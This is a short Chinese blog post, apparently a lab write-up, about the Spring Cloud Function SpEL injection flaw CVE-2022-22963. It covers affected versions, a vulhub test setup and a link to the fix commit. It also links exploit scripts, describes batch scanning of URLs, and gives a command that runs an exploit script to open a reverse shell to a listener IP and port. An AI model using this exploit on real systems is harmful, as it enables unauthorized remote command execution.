Spring Cloud Function SPEL表达式注入漏洞(CVE-2022-22963)

1.漏洞描述

       SpringCloudFunction是SpringBoot开发的一个Servless中间件(FAAS),支持基于SpEL的函数式动态路由。当Spring Cloud Function 启用动态路由functionRouter时, HTTP请求头

spring.cloud.function.routing-expression参数存在SPEL表达式注入漏洞,攻击者可通过该漏洞进行远程命令执行。

2.影响版本

Spring Cloud Function 3.0.0 <= v3.2.2

3.POC和EXP

下载地址:https://github.com/chaosec2021/Spring-cloud-function-SpEL-RCE

4.漏洞环境搭建

本次环境使用docker+vulhub搭建,进入vulhub/spring/CVE-2022-22963目录,执行docker-compose up –d安装

端口默认8080,访问Spring Web页面

5.漏洞复现

使用POC脚本检测,可以批量检测

创建url.txt,内容为http://192.168.42.143:8080/

使用exp脚本反弹shell

Kali开启监听

反弹shell

python3 Spel_RCE_Bash_EXP.py http://192.168.42.143:8080/ 192.168.42.147 1919

6.修复建议

官方目前发布了修复此漏洞的 commit:https://github.com/spring-cloud/spring-cloud-function/commit/0e89ee27b2e76138c16bcba6f4bca906c4f3744f,可下载官方的修复代码重新编译打包。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值